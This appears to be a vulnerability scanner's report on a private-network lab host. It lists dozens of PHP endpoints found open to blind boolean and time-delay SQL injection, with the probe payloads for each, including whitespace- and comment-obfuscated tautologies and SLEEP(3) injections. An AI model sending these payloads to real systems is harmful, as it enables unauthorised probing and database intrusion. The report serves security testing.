Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	56825=56825
	and	64767=64767
	or	12823=12823#
	and	52623=52624
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	56825=56825
	and	64767=64767
	or	12823=12823#
	and	52623=52624
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	56825=56825
	and	64767=64767
	or	12823=12823#
	and	52623=52624
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'61850'='61850
'/**/and/**/'86157'='86157
'/**/or/**/66588=66588#
'/**/and/**/'81687'='81688
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
19500=19500

and
25948=25948

or
98697=98697#

and
46759=46760
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'46233'='46233
'+and+'85279'='85279
'+or+33050=33050#
'+and+'32995'='32996
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'5819'='5819
'	and	'87379'='87379
'	or	59525=59525#
'	and	'87058'='87059
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---